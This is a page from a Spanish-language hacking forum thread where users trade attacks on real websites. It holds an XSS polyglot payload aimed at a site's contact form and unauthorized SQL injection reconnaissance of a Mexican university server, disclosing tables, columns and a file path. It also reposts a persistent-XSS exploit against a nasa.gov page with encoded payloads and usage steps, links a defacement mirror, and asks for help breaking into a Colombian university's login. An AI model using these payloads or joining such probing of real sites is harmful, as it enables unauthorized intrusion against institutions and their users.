• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #367733  por Spectretronic
 
Tiene un XSS

Solo tienes que injectar este codigo
en contacto en firefox brinca la alerta en google chorome no te la brica no es mentira cress que voy perder mi tiempo?

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 #372225  por s7evin
 
adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD

http://www.ssocial.ujat.mx/menu.cfm
No estoy muy puesto en Java y menos en servlets... pero parece que intenta usar una variable de SESSION que no está definida ('matricula'). Así que para poder inyectar algo, deberías modificar el objeto de sesión, a lo cual mis conocimientos no llegan.. jeje según mi opinión, tal como tu comentas es 'inofensivo'.

Salu2!
 #372239  por KHC
 
Pues paarte de darte un monton de informacion no le veo problema! Almenos que busques en la misma web donde puedas utilizar los datos para hacer un query!
 #372267  por MichBukana
 
adwind escribió:Que se podría hacer con esto??? Es inofensivo verdad? O.o? XD

http://www.ssocial.ujat.mx/menu.cfm
Estuve mirando no solo en esa aplicacion, si no otras en ese servidor. y resulta que tiene una vulnerabilidad,
una inyeccion sql por POST pero parece que filtra las comillas simples poniendote otra seguida

es un servidor oracle y solo pude sacar esto a nivel web:
Oracle, Apache, windows

alumnos_sinconcluir
Matricula,nombre,total,ciclo

V_social
matricula, nombre, division, nombrediv, carrera, nombrecar, iciclo

D:\Archivos de programa\Apache Group\Apache2\htdocs\servicio_social\index.cfm

Salu2!
 #385607  por Ti0Sam
 
Código: Seleccionar todo
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       : [email protected]
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:
 
http://img341.imageshack.us/img341/4395/snapshot408.png
 
http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
VULNERABILITY LOCATION:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
CROSS SITE SCRIPTING:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
HOW TO USE:
 
"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
 
so double encoded it will look like this:
 
%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
Enjoy!
 
# 1337day.com [2012-08-22]
 #387631  por s7evin
 
Juder... que buena TioSam/CalebBucker xD
Estos de la Nasa no aprenden ni a base de tortas
 #391292  por sanko
 
Ti0Sam escribió:Como quedan los gilipollas que hablan tras las espaldas

http://zone-h.org/mirror/id/18414109
h4x0r...
 #397844  por AssaSsins`
 
hola amigos ustedes que son buenos para estas cosas, que podrian hacer con esta web: http://www.udi.edu.co/paginas/institucional/index.htm

Y este login: http://academusoft.udi.edu.co/udi/herme ... /index.htm

Gracias de antemano a todos los que le intenten meter mano a esto se les agradeceria enormemente, gracias amigos
  • 1
  • 10
  • 11
  • 12
  • 13
  • 14